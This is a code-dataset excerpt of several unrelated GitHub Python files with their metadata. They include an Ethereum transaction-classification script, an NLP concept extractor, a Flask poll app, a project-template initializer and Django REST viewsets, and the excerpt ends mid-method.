\"0x746aebc06d2ae31b71ac51429a19d54e797878e9\": \"Tornado Cash: Mining v2\",\r\n \"0xa160cdab225685da1d56aa342ad8841c3b53f291\": \"Tornado Cash: 100 ETH\",\r\n \"0x910cbd523d972eb0a6f4cae4618ad62622b39dbf\": \"Tornado Cash: 10 ETH\",\r\n \"0x47ce0c6ed5b0ce3d3a51fdb1c52dc66a7c3c2936\": \"Tornado Cash: 1 ETH\",\r\n \"0x12d66f87a04a9e220743712ce6d9bb1b5616b8fc\": \"Tornado Cash: 0.1 ETH\",\r\n \"0x4a57e687b9126435a9b19e4a802113e266adebde\": \"Flexa: FXC Token\",\r\n \"0xa0b86991c6218b36c1d19d4a2e9eb0ce3606eb48\": \"USDC: USDC Token\",\r\n \"0xdac17f958d2ee523a2206206994597c13d831ec7\": \"USDT: USDT Token\",\r\n \"0x4fabb145d64652a948d72533023f6e7a623c7c53\": \"BUSD: Binance USD\",\r\n \"0xa47c8bf37f92abed4a126bda807a7b7498661acd\": \"WUSDT: Wrapped USDT\",\r\n \"0xc02aaa39b223fe8d0a0e5c4f27ead9083c756cc2\": \"WETH: Wrapped ETH\"\r\n}\r\n\r\ndef generate_features(dataset):\r\n features = []\r\n callData = []\r\n for index, row in dataset[['txData', 'txTrace']].iterrows():\r\n txData = ast.literal_eval(row['txData'])\r\n txTrace = ast.literal_eval(row['txTrace'])\r\n callData.append(aggregateCallData(txTrace))\r\n\r\n features.append([\r\n int(txData['from'], 0) % (2 ** 30),\r\n (int(txData['to'], 0) if txData['to'] is not None else 0) % (2 ** 30),\r\n int(txData['gas'], 0),\r\n int(txData['gasPrice'], 0) / (10 ** 9),\r\n (int(txData['input'][:10], 0) if txData['input'] != '0x' else 0) % (2 ** 30),\r\n (int(len(txData['input'][10:])) / 32 if txData['input'] != '0x' else 0),\r\n int(txData['nonce'], 0),\r\n int(txData['value'], 0) / (10 ** 18),\r\n\r\n int(txTrace['gas'], 0),\r\n (int(len(txTrace['output'])) - 2 if 'output' in txTrace.keys() else 0),\r\n (int(txTrace['gasUsed'], 0) if 'gasUsed' in txTrace.keys() else 0)\r\n ])\r\n\r\n mainFeatures = pd.DataFrame(np.array(features), columns=['from', 'to', 'gasLimit', 'gasPrice', 'inputMethod',\r\n 'inputSize', 'nonce', 'value', 'txTraceGas', 'outputSize',\r\n 'gasUsed'])\r\n callFeatureNames = ['totalCalls', 'nCALL', 'nSTATICCALL', 'nDELEGATECALL', 'nCREATE',\r\n 'nSELFDESTRUCT', 'totalValue', 'totalInputSize', 'totalOutputSize',\r\n 'callsGasUsed', 'nErrors', 'errExecRev', 'errOutOfGas', 'errBadInst',\r\n 'errBadJumpDest'] + list(contractDict.values())\r\n callFeatures = pd.DataFrame(np.array(callData), columns=callFeatureNames)\r\n\r\n return pd.concat([mainFeatures, callFeatures], axis=1)\r\n\r\ndef aggregateCallData(trace):\r\n callData = {\r\n 'totalCalls': 0,\r\n 'nCALL': 0,\r\n 'nSTATICCALL': 0,\r\n 'nDELEGATECALL': 0,\r\n 'nCREATE': 0,\r\n 'nSELFDESTRUCT': 0,\r\n 'totalValue': 0,\r\n 'totalInputSize': 0,\r\n 'totalOutputSize': 0,\r\n 'callsGasUsed': 0,\r\n 'nErrors': 0,\r\n 'errExecRev': 0,\r\n 'errOutOfGas': 0,\r\n 'errBadInst': 0,\r\n 'errBadJumpDest': 0\r\n }\r\n contract_count = dict.fromkeys(list(contractDict.keys()), 0)\r\n\r\n def recurseCalls(trace):\r\n if 'calls' in trace.keys():\r\n for intTrace in trace['calls']:\r\n recurseCalls(intTrace)\r\n\r\n callData['totalCalls'] += 1\r\n if trace['type'] == 'CALL':\r\n callData['nCALL'] += 1\r\n elif trace['type'] == 'STATICCALL':\r\n callData['nSTATICCALL'] += 1\r\n elif trace['type'] == 'DELEGATECALL':\r\n callData['nDELEGATECALL'] += 1\r\n elif trace['type'] == 'CREATE':\r\n callData['nCREATE'] += 1\r\n elif trace['type'] == 'SELFDESTRUCT':\r\n callData['nSELFDESTRUCT'] += 1\r\n\r\n callData['totalValue'] += (int(trace['value'], 0) / (10 ** 18) if 'value' in trace.keys() else 0)\r\n callData['totalInputSize'] += (int(len(trace['input'])) - 2 if 'input' in trace.keys() else 0)\r\n callData['totalOutputSize'] += (int(len(trace['output'])) - 2 if 'output' in trace.keys() else 0)\r\n callData['callsGasUsed'] += (int(trace['gasUsed'], 0) if 'gasUsed' in trace.keys() else 0)\r\n\r\n if 'error' in trace.keys():\r\n callData['nErrors'] += 1\r\n if trace['error'] == 'execution reverted':\r\n callData['errExecRev'] += 1\r\n elif trace['error'] == 'Out of gas':\r\n callData['errOutOfGas'] += 1\r\n elif trace['error'] == 'Bad instruction':\r\n callData['errBadInst'] += 1\r\n elif trace['error'] == 'Bad jump destination':\r\n callData['errBadJumpDest'] += 1\r\n\r\n if 'to' in trace.keys():\r\n if trace['to'] in contract_count:\r\n contract_count[trace['to']] += 1\r\n\r\n recurseCalls(trace)\r\n return list(callData.values()) + list(contract_count.values())\r\n\r\ndef predictClassification():\r\n #### DATA LOAD ####\r\n train = pd.read_csv('train.csv')\r\n train_features = generate_features(train)\r\n test = pd.read_csv('test.csv')\r\n test_features = generate_features(test)\r\n\r\n #### CLASSIFICATION ####\r\n data = pd.concat([train_features, train['Label0']], axis=1)\r\n grid = pycaret.classification.setup(data=data,\r\n target='Label0',\r\n normalize=True,\r\n normalize_method='minmax',\r\n fold_shuffle=True,\r\n remove_outliers=True,\r\n feature_selection=True,\r\n fix_imbalance=True,\r\n fold=10,\r\n html=False,\r\n silent=True)\r\n\r\n top5 = pycaret.classification.compare_models(n_select=5, sort='AUC')\r\n tuned_top5 = [pycaret.classification.tune_model(i,\r\n optimize='AUC',\r\n n_iter=10,\r\n search_library='tune-sklearn',\r\n search_algorithm='bayesian',\r\n early_stopping=True,\r\n choose_better=True) for i in top5]\r\n bagged_top5 = [pycaret.classification.ensemble_model(i, optimize='AUC') for i in tuned_top5]\r\n blender = pycaret.classification.blend_models(estimator_list=top5, optimize='AUC', method='soft')\r\n best_classification_model = pycaret.classification.automl(optimize='AUC')\r\n classificationPredictions = pycaret.classification.predict_model(best_classification_model, data=test_features, raw_score=True)['Score_True']\r\n return classificationPredictions\r\n\r\ndef predictRegression():\r\n #### DATA LOAD ####\r\n train = pd.read_csv('train.csv')\r\n train_features = generate_features(train)\r\n test = pd.read_csv('test.csv')\r\n test_features = generate_features(test)\r\n\r\n #### REGRESSION ####\r\n data = pd.concat([train_features, train[['Label0', 'Label1']]], axis=1)\r\n data = data[data['Label0'] == True]\r\n data = data.drop(columns=['Label0'])\r\n grid = pycaret.regression.setup(data=data,\r\n target='Label1',\r\n normalize=True,\r\n normalize_method='minmax',\r\n fold_shuffle=True,\r\n remove_outliers=True,\r\n feature_selection=True,\r\n feature_selection_method='boruta',\r\n fold=10,\r\n html=False,\r\n silent=True)\r\n\r\n top5 = pycaret.regression.compare_models(n_select=5, sort='MSE')\r\n tuned_top5 = [pycaret.regression.tune_model(i,\r\n optimize='MSE',\r\n n_iter=10,\r\n search_library='tune-sklearn',\r\n search_algorithm='bayesian',\r\n early_stopping=True,\r\n choose_better=True) for i in top5]\r\n bagged_top5 = [pycaret.regression.ensemble_model(i, optimize='MSE') for i in tuned_top5]\r\n blender = pycaret.regression.blend_models(estimator_list=top5, optimize='MSE')\r\n best_regression_model = pycaret.regression.automl(optimize='MSE')\r\n regressionPredictions = pycaret.regression.predict_model(best_regression_model, data=test_features)['Label']\r\n return regressionPredictions\r\n\r\n#### CREATE submission.csv ####\r\npd.concat([predictClassification(), predictRegression()], axis=1).to_csv('submission.csv', encoding='utf-8', header=False, index=False)\r\n","repo_name":"gibz104/alphamev-submission","sub_path":"submission.py","file_name":"submission.py","file_ext":"py","file_size_in_byte":13289,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"24672404754","text":"import os\nimport subprocess\n\ndef shell_run(cmd, stdout=None, stdin=None, stderr=None):\n if stderr is None:\n stderr = open(os.devnull, \"w\")\n elif isinstance(stderr, str):\n stderr = open(stderr, \"w\")\n\n if stdout is None:\n stdout = open(os.devnull, \"w\")\n elif isinstance(stdout, str):\n stdout = open(stdout, \"w\")\n\n res = subprocess.call(cmd, stdout=stdout, stderr=stderr, stdin=stdin)\n\n stderr.close()\n stdout.close()\n\n return res","repo_name":"SPOClab-ca/COVFEFE","sub_path":"utils/shell_run.py","file_name":"shell_run.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"7"} +{"seq_id":"16999779629","text":"import glob\nimport string\nimport keyword\nimport decamelize\nimport nltk\nimport json\nimport logging\nimport re\nimport os\nimport numpy as np\nfrom nltk.corpus import stopwords\nfrom nltk.tokenize import word_tokenize\nimport pandas as pd\n\nlogging.basicConfig(level=logging.DEBUG)\n\n# This extraction of concepts is based on the NLP method\n\ndef extract(folder, project_name, nlp):\n\n extracted_code = []\n extracted_test = []\n\n kw_pattern = re.compile(r'\\b(' + r'|'.join(generate_kw()) + r')\\b\\s*')\n test_pattern = re.compile(r'test', re.IGNORECASE)\n\n # fetch all java files from folder\n files = [f for f in glob.glob(folder + '**/*.java', recursive=True)]\n\n # remove any folders that may resemble a file\n files = [f for f in files if os.path.isfile(f)]\n\n #remove only test files\n code_files = [f for f in files if not test_pattern.search(f)]\n\n # take only test files\n test_files = [f for f in files if test_pattern.search(f)]\n\n # FOR CODE\n code_token_ctr = 0\n\n for f in code_files:\n # ingest the source code\n try:\n res = code_ingest(f, project_name, kw_pattern, nlp)\n extracted_code.append(res[0])\n code_token_ctr+=res[1]\n except:\n logging.debug('Unable to read code {}'.format(f))\n # classes.append(x)\n # methods.append(y)\n # attributes.append(z)\n\n # FOR TEST\n test_token_ctr = 0\n\n for f in test_files:\n # ingest the source code\n try:\n res = code_ingest(f, project_name, kw_pattern, nlp)\n extracted_test.append(res[0])\n test_token_ctr+=res[1]\n except:\n logging.debug('Unable to read code {}'.format(f))\n # classes.append(x)\n # methods.append(y)\n # attributes.append(z)\n\n extracted_code = [ x for x in extracted_code if x ] # remove empty strings\n extracted_test = [ x for x in extracted_test if x ] # remove empty strings\n\n extracted_code = ','.join(extracted_code)\n extracted_test = ','.join(extracted_test)\n\n return extracted_code, len(code_files), code_token_ctr, extracted_test, len(test_files), test_token_ctr\n\ndef code_ingest(filename, project_name, kw_pattern, nlp):\n class_list = []\n att_list = []\n method_list = []\n\n try:\n with open(filename, 'r') as file:\n code_text = file.readlines()\n except:\n with open(filename, 'r', encoding='utf-8') as file:\n code_text = file.readlines()\n\n terms_list = []\n\n # strip strings of newlines and whitespaces\n code_text = [x.strip() for x in code_text]\n\n # only pull classes, attributes & methods\n for x in code_text:\n if (x.startswith('public') or x.startswith('private') or x.startswith('protected') or x.startswith('class')\n or x.startswith('enum')):\n terms_list.append(x)\n\n # remove noise by tokenising\n terms_list = [word_tokenize(x) for x in terms_list]\n\n # flatten list\n terms_list = [x for sublist in terms_list for x in sublist]\n\n # decamelize\n terms_list = [decamelize.convert(x) for x in terms_list]\n\n # split back those decamelised to tuple values (using only first '_')\n terms_list = [x.split('_') for x in terms_list]\n\n # flatten list\n terms_list = [x for sublist in terms_list for x in sublist]\n\n # remove any characters w/out meaning\n terms_list = [x for x in terms_list if (len(x) > 2 and x.isalpha() and x not in project_name)]\n\n # remove keywords\n terms = kw_pattern.sub('', ' '.join(terms_list))\n\n terms_list = [x.lemma_ for x in nlp(terms)]\n\n terms = ' '.join(terms_list)\n\n return terms, len(terms_list)\n\ndef generate_kw():\n # populate keywords list including stopwords\n try:\n with open('java_kw.txt', 'r') as f:\n java_kw = f.readlines()\n java_kw = [x.strip() for x in java_kw]\n except:\n print('Java keywords missing!')\n\n kw_list = keyword.kwlist # python keywords\n kw_list += java_kw # java keywords\n kw_list += (set(stopwords.words('english'))) # stop words\n return kw_list\n","repo_name":"zakipauzi/concept-domain-coverage","sub_path":"code_extract.py","file_name":"code_extract.py","file_ext":"py","file_size_in_byte":4071,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"38044206543","text":"# numpy.fft模块中的fftshift函数可以将FFT输出中的直流分量移动到频谱的中央。ifftshift函数则是其逆操作。\nimport numpy as np\nimport cv2\nfrom matplotlib.pyplot import plot, show\n# wave=cv2.imread('U.jpg',0)\n# # x = np.linspace(0, 2 * np.pi, 30)\n# # wave = np.cos(x) # 创建一个包含30个点的余弦波信号。\n# transformed = np.fft.fft(wave) # 使用fft函数对余弦波信号进行傅里叶变换。\n# shifted = np.fft.fftshift(transformed) # 使用fftshift函数进行移频操作。\n# # orignal=(np.all((np.fft.ifftshift(shifted) - transformed)<10**-9))\n# print(np.all((np.fft.ifftshift(shifted) - transformed) < 10 ** -9)) # 用ifftshift函数进行逆操作,这将还原移频操作前的信号。\n# plot(transformed, lw=2)\n# # plot(shifted, lw=3)\n# show() # 使用Matplotlib分别绘制变换和移频处理后的信号。\n# freqs = np.fft.fftfreq(9, d=1./9).reshape(3, 3)\n\nfreqs1=np.array([[ 0., 1., 2.],[ 3., 4., -4.],[-3., -2., -1.]])\nfreqs2=np.array([[ 100., 1., 2.],[ 300., 4., -4.],[-3., -2., -1.]])\n# print=( np.fft.ifftshift(np.fft.fftshift(freqs)))\n\ntransformed1 = np.fft.fft(freqs1)\ntransformed2 = np.fft.fft(freqs2)\nresult1=np.matmul(transformed1,transformed2)\nprint(abs(np.fft.ifftshift(np.fft.fftshift(result1))))\nprint(np.matmul(freqs1,freqs2))","repo_name":"wangyingyu1969/exercise","sub_path":"移频.py","file_name":"移频.py","file_ext":"py","file_size_in_byte":1312,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"35634813899","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu May 10 09:57:23 2018\n\n@author: susanachicano\n\"\"\"\n\nimport re\n\n# Regular expressions to check for specific patterns in the tags\nlower = re.compile(r'^([a-z]|_)*$')\nlower_colon = re.compile(r'^([a-z]|_)*:([a-z]|_)*$')\nproblemchars = re.compile(r'[=\\+/&<>;\\'\"\\?%#$@\\,\\. \\t\\r\\n]')\n\nSAMPLE_FILE = \"sample_sf.osm\"\n\ndef key_type(element, keys):\n if element.tag == \"tag\":\n for tag in element.iter('tag'):\n k = tag.get('k')\n if lower.search(element.attrib['k']):\n keys['lower'] = keys['lower'] + 1\n elif lower_colon.search(element.attrib['k']):\n keys['lower_colon'] = keys['lower_colon'] + 1\n elif problemchars.search(element.attrib['k']):\n keys['problemchars'] = keys['problemchars'] + 1\n else:\n keys['other'] = keys['other'] + 1\n \n return keys\n\ndef process_map(filename):\n keys = {\"lower\": 0, \"lower_colon\": 0, \"problemchars\": 0, \"other\": 0}\n for _, element in ET.iterparse(filename):\n keys = key_type(element, keys)\n\n return keys","repo_name":"schicano/Wrangle_OpenStreetMap_Data","sub_path":"tag_types.py","file_name":"tag_types.py","file_ext":"py","file_size_in_byte":1135,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"24121048847","text":"import json\n\nfrom flask import Flask, request\nimport rethinkdb as r\n\nfrom .utils.db import Database\n\nindex = \"\"\"\n\n\n\n\n Strawpoll?\n\n\n

Add an option!

\n
\n

Anime name:

\n

\n
\n

Options

\n {options}\n\n\n\"\"\"\n\nredirect = \"\"\"\n\n\n\n\n\n\n\n \n\n\n\"\"\"\n\nhref = \"\"\"\nBack\n\"\"\"\n\n\ndb = Database()\n\napp = Flask(__name__)\n\n\n@app.route(\"/test\")\ndef test():\n return \"This works? Testing python backend webserver.\"\n\n\n@app.route(\"/\") # \"/\" will refer to www.fwiedwice.me/strawpoll/\n@app.route(\"/poll\")\ndef poll():\n options = db.get_options()\n print(options)\n option_message = \"\"\n option_message += \"\"\"
\"\"\"\n for option, votes in options.items():\n option_message += ''\n option_message += \"{option:>20}:{votes:>5}
\".format(option=option,\n votes=votes)\n stuff = \"\"\n option_message += \"
{}
\".format(stuff)\n if len(options) > 0:\n option_message += \"\"\"

\"\"\"\n return index.format(options=option_message)\n\n\n@app.route(\"/results\")\ndef results():\n return \"No results yet.\"\n\n\n@app.route(\"/vote\", methods=[\"GET\"])\ndef vote():\n args = {k: v[0] for k, v in dict(request.args).items()}\n if request.method != \"GET\" or len(args) == 0:\n return \"Invalid!\" + href\n\n print(str(args))\n\n option = args['option']\n\n if not db.already_exists(option):\n return \"Option doesn't exist
\" + href\n db.add_vote(option)\n votes = db.get_votes(option)\n return \"{option} now has {votes} votes
\".format(option=option,\n votes=votes) + href\n\n\n@app.route(\"/addoption\", methods=[\"GET\"])\ndef addoption():\n args = {k: v[0] for k, v in dict(request.args).items()}\n if request.method != \"GET\" or len(args) == 0:\n return \"Invalid!
\" + href\n\n print(str(args))\n\n option = args['option']\n\n if db.already_exists(option):\n return \"Already exists
\" + href\n else:\n db.create_option(option)\n return \"Option created
\" + href\n\n\nif __name__ == \"__main__\":\n app.run()\n","repo_name":"QingyuChai/Fake-Strawpoll","sub_path":"__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"8875640625","text":"import os\n\ndef delete_dummy_files():\n \"\"\"Delete dummy test files.\"\"\"\n os.remove(\"package/dummy.py\")\n os.remove(\"tests/dummy_test.py\")\n\ndef rename_project(project):\n \"\"\"Rename the package directory.\"\"\"\n os.rename(\"package\", project)\n\ndef update_test_config(project):\n \"\"\"Update the test configuration.\"\"\"\n original = open(\"tests/__init__.py\", \"r\").read()\n open(\"tests/__init__.py\", \"w\").write(\n original.replace(\"package\", project))\n\ndef update_linter_test(project):\n \"\"\"Update the linter test.\"\"\"\n original = open(\"tests/pylint_test.py\", \"r\").read()\n open(\"tests/pylint_test.py\", \"w\").write(\n original.replace('PROJECT_NAME=\"package\"', 'PROJECT_NAME=\"%s\"' % project))\n\ndef update_service_test(project):\n \"\"\"Update the tests for the service submodule.\"\"\"\n original = open(\"tests/service_test.py\", \"r\").read()\n open(\"tests/service_test.py\", \"w\").write(\n original.replace(\"from package import\", \"from %s import\" % project))\n\ndef update_builder_test(project):\n \"\"\"Update the tests for the builder submodule.\"\"\"\n original = open(\"tests/builder_test.py\", \"r\").read()\n open(\"tests/builder_test.py\", \"w\").write(\n original.replace(\"from package import\", \"from %s import\" % project))\n\ndef update_noseconfig(project):\n \"\"\"Update the test configuration to match with the projects package name.\"\"\"\n original = open(\"nose.cfg\", \"r\").read()\n open(\"nose.cfg\", \"w\").write(\n original.replace(\"cover-package=package,tests\", \"cover-package=%s,tests\" % project))\n\ndef update_pylintrc(project):\n \"\"\"Update the init-hook for pylint.\"\"\"\n original = open(\"nose.cfg\", \"r\").read()\n open(\"nose.cfg\", \"w\").write(original.replace(\n \"\"\"init-hook='import sys, os; sys.path.insert[0](\".\"); sys.path.insert[0](\"./package\");'\"\"\",\n \"\"\"init-hook='import sys, os; sys.path.insert[0](\".\"); sys.path.insert[0](\"./%s\");'\"\"\"\n % project))\n\ndef update_main(project, is_flask_service):\n \"\"\"Remove the not required code from __main__.py\"\"\"\n original = open(\"%s/__main__.py\" % project, \"r\").read()\n\n original = original.replace(\"package\", project)\n\n start_ms = \"#### START MICROSERVICE CODE\"\n end_ms = \"#### END MICROSERVICE CODE\"\n start_creation = \"#### START MICROSERVICE INSTANCE CREATION\"\n end_creation = \"#### END MICROSERVICE INSTANCE CREATION\"\n\n if not is_flask_service:\n current_index = 0\n\n new = original[current_index : original.find(start_ms)]\n current_index = original.find(end_ms) + len(end_ms)\n\n new += original[current_index : original.find(start_creation)]\n current_index = original.find(end_creation) + len(end_creation)\n\n new += original[current_index:]\n original = new\n else:\n original = original.replace(\n 'make_app(\"package\")',\n 'make_app(\"%s\")' % project)\n\n original = original.replace(start_ms, \"\").replace(end_ms, \"\")\n original = original.replace(start_creation, \"\").replace(end_creation, \"\")\n\n open(\"%s/__main__.py\" % project, \"w\").write(original)\n\ndef delete_flask_service_files(project):\n \"\"\"Delete flask related files.\"\"\"\n os.remove(\"%s/service.py\" % project)\n os.remove(\"tests/service_test.py\")\n\n os.remove(\"%s/builder.py\" % project)\n os.remove(\"tests/builder_test.py\")\n\ndef get_user_config():\n \"\"\"Reads the project configuration from the user.\n\n Returns:\n tuple: Returns a tuple, containing (project_name, is_flask_service)\n \"\"\"\n project = str(input(\"\"\"Please give your project name: \"\"\"))\n\n flask_service = str(input(\n \"\"\"Should \"%s\" contain a Flask service? (y/n) \"\"\" % project)\n ).lower().strip()\n\n if flask_service:\n flask_service = flask_service[0] == \"y\"\n\n return project, flask_service\n\ndef main():\n \"\"\"Run the initializtion and execute all steps to\n transform the template into a usable project.\n \"\"\"\n project, is_flask_service = get_user_config()\n\n delete_dummy_files()\n rename_project(project)\n update_test_config(project)\n update_linter_test(project)\n update_noseconfig(project)\n update_pylintrc(project)\n update_builder_test(project)\n update_service_test(project)\n update_main(project, is_flask_service)\n\n if not is_flask_service:\n delete_flask_service_files(project)\n\nif __name__==\"__main__\":\n main()\n print(\"You can now delete initialize.py\")\n","repo_name":"T-002/python-project-template","sub_path":"initialize.py","file_name":"initialize.py","file_ext":"py","file_size_in_byte":4410,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"11757418852","text":"import random\n\nimport matplotlib\nimport numpy as np\nimport scipy.stats\nfrom matplotlib import pyplot as plt\n\n\ndef gen_data():\n random.seed(148)\n treatment_dist = (119.5, 5.0)\n control_dist = (120, 4.0)\n sample_size = 100\n treatment_times, control_times = [], []\n for s in range(sample_size):\n treatment_times.append(random.gauss(treatment_dist[0], treatment_dist[1]))\n control_times.append(random.gauss(control_dist[0], control_dist[1]))\n return control_times, treatment_times\n\n\ndef t_stat_p_value(control_times, treatment_times):\n control_mean = round(sum(control_times) / len(control_times), 2)\n treatment_mean = round(sum(treatment_times) / len(treatment_times), 2)\n print(f'Treatment mean - control mean = {round(treatment_mean - control_mean, 2)} minutes')\n two_sample_test = scipy.stats.ttest_ind(treatment_times, control_times, equal_var=False)\n print(f'The t-statistic from two-sample test is {round(two_sample_test[0], 2)}')\n print(f'The p-value from two-sample test is {round(two_sample_test[1], 2)}')\n\n\nif __name__ == '__main__':\n t_stat = -2.26\n t_dist = []\n num_bins = 1000\n for i in range(100000):\n t_dist.append(np.random.standard_t(198))\n\n matplotlib.use('TkAgg')\n plt.hist(t_dist, bins=num_bins, weights=np.array(len(t_dist) * [1]) / len(t_dist))\n plt.axvline(t_stat, color='w')\n plt.axvline(-t_stat, color='w')\n plt.title('T-distribution with 198 Degrees of Freedom')\n plt.xlabel('T-statistic')\n plt.ylabel('Probably')\n plt.show()\n\n control_times, treatment_times = gen_data()\n t_stat_p_value(control_times, treatment_times)\n ","repo_name":"zuzuqo/ossu","sub_path":"1 Intro CS/02.Intro to CS/21.Randomized Trials and Hypothesis Checking/21.1.Checking Significance/t_distribution.py","file_name":"t_distribution.py","file_ext":"py","file_size_in_byte":1649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"34645154740","text":"\ncont = 1\ntotal_eleitores = int(input(\"Quantos candidatos participaram dessa eleicao?\"))\nnumero_eleitor = 1\nlista_votos = []\na = 0\nwhile(cont <= total_eleitores):\n voto = (input(\"Diga o voto do candidato{}: (A) --> Geremias. (B) --> Lila. (C) --> Gogos\".format(numero_eleitor)))\n lista_votos.append(voto)\n cont += 1\nprint(lista_votos)\n\na = 0\nb = 0\nc = 0\nfor voto in lista_votos:\n if(voto == \"a\"):\n a = a + 1\n elif(voto == \"b\"):\n b = b + 1\n elif(voto == \"c\"):\n c = c + 1\nprint(\"Votos no Geremias:\", a)\nprint(\"Votos na Lila:\", b)\nprint(\"Votos no Gogos:\", c)\n\n","repo_name":"Felipecard/Codigos-Exercicios-Python","sub_path":"4. Listas/Eleicao.py","file_name":"Eleicao.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"36318512272","text":"def make_average():\n # take advantage of the fact that series(lists) are \"\"mutable\"\"\n series = []\n\n def average(new_value):\n # series is a free variable\n series.append(new_value)\n print('series', series)\n total = sum(series)\n return total / len(series)\n\n return average\n\n\navg = make_average()\nprint(avg(10)) # series [10]\nprint(avg(11)) # series [10, 11]\nprint(avg(12)) # series [10, 11, 12]\n\nprint(avg.__code__.co_freevars) # ('series',)\n","repo_name":"twtrubiks/fluent-python-notes","sub_path":"what_is_the_closures/demo1.py","file_name":"demo1.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"7"} +{"seq_id":"3968537302","text":"from flask_socketio import emit, send\nfrom datetime import datetime\nimport json\n\nfrom app.main.models import eInstance, eMessage\nfrom .. import socketio, mongodb\n\n\n@socketio.on('message')\ndef handle_message(msg):\n #get message sent from client(s)\n name = msg['name']\n content = msg['message']\n now = datetime.now().strftime('%A %I:%M:%S %p').lstrip(\"0\").replace(\" 0\", \" \")\n \n #put received message into database\n emessage_object = eMessage(name=name, content=content, date_posted=now)\n emessage_object.save()\n\n #broadcast received message to all clients\n json_data = {\n 'name' : name,\n 'content' : content,\n 'date' : now\n }\n send({'json_data' : json_data}, broadcast=True)\n\n@socketio.on('connected')\ndef handle_connection():\n #a new client joined; update page view; broadcast to all clients\n einst = eInstance.objects().first()\n einst.page_views += 1\n einst.update(page_views = einst.page_views)\n emit('page_view_increase', {'page_views' : einst.page_views}, broadcast=True)\n","repo_name":"ShubhankarGore/Live-Chat-Microservice","sub_path":"app/main/events.py","file_name":"events.py","file_ext":"py","file_size_in_byte":1047,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"3099780290","text":"from django.db import transaction\nfrom django.core.exceptions import ValidationError\n\nfrom rest_framework import viewsets, status\nfrom rest_framework.generics import ListAPIView\nfrom rest_framework.response import Response\nfrom rest_framework import serializers\n\nfrom users.models import Jpersonas\nfrom users.serializers import JpersonasSerializer\n\nfrom .serializers import (\n JcanalesrecepcionesSerializer,\n JclasestarjetasSerializer,\n JtiposproductosSerializer,\n JconceptosSerializer,\n JmarcastarjetasSerializer,\n JprioridadesSerializer,\n JtipostarjetasSerializer,\n JtarjetasSerializer,\n JtiposcomentariosSerializer,\n JtickettiposSerializer,\n JtipostransaccionesSerializer,\n JproblemasSerializer,\n)\nfrom .models import (\n Jcanalesrecepciones,\n Jclasestarjetas,\n Jtiposproductos,\n Jconceptos,\n Jmarcastarjetas,\n Jprioridades,\n Jtipostarjetas,\n Jtarjetas,\n Jtiposcomentarios,\n Jtickettipos,\n Jtipostransacciones,\n Jproblemas,\n)\n\nCARD_TICKET_TYPE = 2\n\n\nclass JcanalesrecepcionesViewSet(viewsets.ModelViewSet):\n queryset = Jcanalesrecepciones.objects.all()\n serializer_class = JcanalesrecepcionesSerializer\n\n\nclass JclasestarjetasViewSet(viewsets.ModelViewSet):\n queryset = Jclasestarjetas.objects.all()\n serializer_class = JclasestarjetasSerializer\n\n\nclass JtiposproductosViewSet(viewsets.ModelViewSet):\n queryset = Jtiposproductos.objects.all()\n serializer_class = JtiposproductosSerializer\n\n\nclass JconceptosViewSet(viewsets.ModelViewSet):\n queryset = Jconceptos.objects.all()\n serializer_class = JconceptosSerializer\n\n\nclass JmarcastarjetasViewSet(viewsets.ModelViewSet):\n queryset = Jmarcastarjetas.objects.all()\n serializer_class = JmarcastarjetasSerializer\n\n\nclass JprioridadesViewSet(viewsets.ModelViewSet):\n queryset = Jprioridades.objects.all()\n serializer_class = JprioridadesSerializer\n\n\nclass JtipostarjetasViewSet(viewsets.ModelViewSet):\n queryset = Jtipostarjetas.objects.all()\n serializer_class = JtipostarjetasSerializer\n\n\nclass JtarjetasViewSet(viewsets.ModelViewSet):\n queryset = Jtarjetas.objects.all()\n serializer_class = JtarjetasSerializer\n\n\nclass JtiposcomentariosViewSet(viewsets.ModelViewSet):\n queryset = Jtiposcomentarios.objects.all()\n serializer_class = JtiposcomentariosSerializer\n\n\nclass JtickettiposViewSet(viewsets.ModelViewSet):\n queryset = Jtickettipos.objects.all()\n serializer_class = JtickettiposSerializer\n\n\nclass JtipostransaccionesViewSet(viewsets.ModelViewSet):\n queryset = Jtipostransacciones.objects.all()\n serializer_class = JtipostransaccionesSerializer\n\n\n# Customize methods to get certain types of field in the tables.\nclass JtiposproductosJconceptosListView(ListAPIView):\n queryset = Jconceptos.objects.all()\n serializer_class = JconceptosSerializer\n\n def list(self, request, *args, **kwargs):\n idtipoproducto = self.kwargs.get(\"idtipoproducto\")\n queryset = Jconceptos.objects.filter(\n idtipoproducto,\n )\n if not queryset.exists():\n return Response(\n {\n \"detail\": \"idtipoproducto \"\n + f\"{idtipoproducto}\"\n + \" was not found in the records\"\n },\n status=status.HTTP_404_NOT_FOUND,\n )\n serializer = self.get_serializer(queryset, many=True)\n return Response(serializer.data)\n\n\nclass JproblemasViewSet(viewsets.ModelViewSet):\n queryset = Jproblemas.objects.all()\n serializer_class = JproblemasSerializer\n\n def create(self, request, *args, **kwargs):\n personas_serializer = JpersonasSerializer(\n data=request.data.get(\"persona\"), context={\"request\": request}\n )\n tarjeta_serializer = JtarjetasSerializer(\n data=request.data.get(\"tarjeta\"), context={\"request\": request}\n )\n problemas_serializer = JproblemasSerializer(\n data=request.data.get(\"ticket\"), context={\"request\": request}\n )\n\n 